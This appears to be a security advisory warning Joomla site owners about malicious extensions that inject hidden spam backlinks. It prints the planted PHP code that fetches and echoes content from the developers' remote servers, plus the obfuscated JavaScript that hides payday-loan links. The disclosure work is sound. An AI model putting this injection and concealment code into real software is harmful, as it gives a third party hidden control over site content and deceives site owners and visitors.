The most popular vulnerable extensions are:
- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).
- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.
- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.
- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.
- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).
The hidden backlinks are being inserted via the following code:
<?php
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>OR
<?php
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>
etc..The file on there server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.
This is what that code is inserting into the site:
<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
<p class="dnn"By PDPRELUK <a href="/http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
OR<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script><p class="nemonn">By PDPRELUK <a href="/http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
Additional extensions from these developers that are possibly vulnerable as well:
iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)
Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show
Plimun.com:
- Plimun Twitter Ticker
- Twitter Show
I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displayed hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr
So what can we do to stop these spammers/hackers?
1. Remove the extensions from your or your clients websites (or just remove the malicious code (BEACON Says: NOT Recommended, see below for details)).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to : This email address is being protected from spambots. You need JavaScript enabled to view it.
This email address is being protected from spambots. You need JavaScript enabled to view it.They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are: autson.com , inowweb.com , plimun.com
The actions of developers like this adversely affects the entire Joomla community and we must do something to stop it.
Additional Behaviour noticed with ShareThis for Joomla! :
The extension was used/evaluated for use for website(s) by Beacon Solutions, and some peculiar behaviour was noticed.
- The above mentioned extension used to load an unsecure code. (We accidentaly discovered it when we enabled sitewide SSL/HTTPS a few months ago). when Linkedin (and maybe social options were selected), a nasty browser warning (for loading unsecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension)
- Another aspect worh mentioning the above mentioned backlinks are not loaded in some configurations (but is definately loaded when LinkedIN is selected), which suggests there may be more lines of code controlling the backlink behaviour.
- Pleae refrain from just fixing (unless you make a full code review), remove and find an alternative extension instead. (and pray its made by a good guy)